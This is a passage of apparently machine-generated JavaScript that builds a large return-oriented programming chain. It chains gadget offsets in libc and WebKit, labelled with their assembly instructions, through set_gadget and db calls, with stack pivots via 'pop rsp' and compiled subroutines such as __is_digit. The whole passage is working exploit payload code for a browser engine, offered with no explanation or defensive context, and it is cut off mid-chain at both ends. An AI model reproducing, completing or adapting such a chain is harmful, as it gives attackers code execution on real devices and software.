set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+175584, //L2704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2706: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+175704, //L2709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+175688, //L2707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2707: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2709: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+175792, //L2710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+175808, //L2712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2710: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2712: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2713: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+175888, //L2715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2715: db([0, 0]); // 0x0 //L2714: set_gadgets([ libc_base+764760, //pop rsi ropchain+175936, //L2717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2717: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2719: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760, //pop rsi ropchain+176056, //L2722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+176040, //L2720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2720: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2722: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+176136, //L2723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+176152, //L2724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2723: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2724: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+176312, //L2728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+176280, //L2726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+176296, //L2727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2725: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2726: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2727: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2728: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+176368, //L2730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2730: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+176496, //L2732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+176512, //L2733 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+176480, //L2731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2731: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2732: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2733: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+176672, //L2737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+176640, //L2735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+176656, //L2736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2734: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2735: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2736: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2737: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+176728, //L2739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2739: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+176856, //L2741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+176872, //L2742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+176840, //L2740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2740: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2741: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2742: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, 
edi libc_base+764760, //pop rsi ropchain+177032, //L2746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+177000, //L2744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+177016, //L2745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2743: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2744: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2745: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2746: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+177088, //L2748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2748: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+177216, //L2750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+177232, //L2751 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+177200, //L2749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2749: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2750: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2751: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+177392, //L2756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+177408, //L2757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+177344, //L2753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2753: db([0, 0]); // 
0x0 set_gadget(libc_base+764760,); //pop rsi //L2754: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L2755: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2756: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2757: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+177520, //L2758+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+177512, //L2758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2758: db([0, 0]); // 0x0 set_gadgets([ ropchain+177536, //L2758+24 ropchain+178280, //L2752 libc_base+764760, //pop rsi ropchain+177576, //L2759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2759: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2761: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+177696, //L2764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+177680, //L2762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2762: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2764: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+177840, //L2767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+177808, //L2765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+177824, //L2766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2765: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L2766: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2767: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+177928, //L2769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L2768: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L2769: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+177984, //L2770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2770: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2772: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+178064, //L2774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2774: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+178168, //L2775 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+178200, //L2777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2775: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2776: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2777: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+178272, //L2778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+763368 //pop rcx ]); //L2778: db([0, 0]); // 0x0 //L2752: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+178400, //L2781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+178416, //L2782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+178384, //L2780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2780: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2781: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2782: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+178528, //L2784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+178576, //L2787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+178544, //L2785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2784: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2785: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2786: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2787: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+178688, //L2788+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+178680, //L2788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2788: db([0, 0]); // 0x0 set_gadgets([ ropchain+178704, //L2788+24 ropchain+178720, //L2783 libc_base+782311, //pop rsp ropchain+178736, //L2789 //L2783: 
libc_base+782311, //pop rsp ropchain+179216, //L2790 //L2789: //L2791: libc_base+764760, //pop rsi ropchain+178776, //L2792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2792: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2794: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+178896, //L2797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+178880, //L2795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2795: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2797: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+179056, //L2801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+179008, //L2798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+179024, //L2799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2798: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2799: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2800: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L2801: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+179112, //L2802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2802: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2804: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+179192, //L2805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2805: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+175896, //L2714 //L2790: libc_base+764760, //pop rsi ropchain+179256, //L2807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2807: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2809: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+179376, //L2812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+179360, //L2810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2810: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2812: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+179520, //L2815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+179488, //L2813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+179504, //L2814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2813: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2814: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2815: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+179600, //L2816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2816: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2818: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, 
//pop rsi ropchain+179720, //L2821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+179704, //L2819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2821: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+179832, //L2822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+179864, //L2824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+179848, //L2823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2822: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2823: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2824: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+180008, //L2827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+179992, //L2826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2825: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L2826: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2827: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+180128, //L2828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180160, //L2830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+180144, //L2829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2828: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2829: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2830: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180264, //L2831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180280, //L2832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2831: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2832: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180400, //L2833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180384, //L2834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2834: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2833: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+180488, //L2836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+180472, //L2835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2835: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2836: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+764760, //pop rsi ropchain+180592, //L2837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180608, //L2838 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2837: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2838: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180728, //L2839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180712, //L2840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2840: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2839: db([0, 0]); // 0x0 //__is_digit: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180800, //L2842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2842: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+180888, //L2843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+180936, //L2846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2843: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2844: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L2845: db([48, 0]); // 0x30 set_gadget(webkit_base+568675,); //pop r8 //L2846: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+181032, //L2848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181016, //L2847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2847: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2848: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+181112, //L2849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2849: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2851: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+181232, //L2854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+181216, //L2852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2852: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2854: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+181392, //L2858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+181360, //L2856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+181376, //L2857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2855: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2856: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2857: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2858: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+181448, //L2860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, 
rdi libc_base+144605 //pop rdi ]); //L2860: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+181576, //L2862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+181592, //L2863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181560, //L2861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2861: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2862: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2863: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+181752, //L2867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+181720, //L2865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181736, //L2866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2864: db([24, 0]); // 0x18 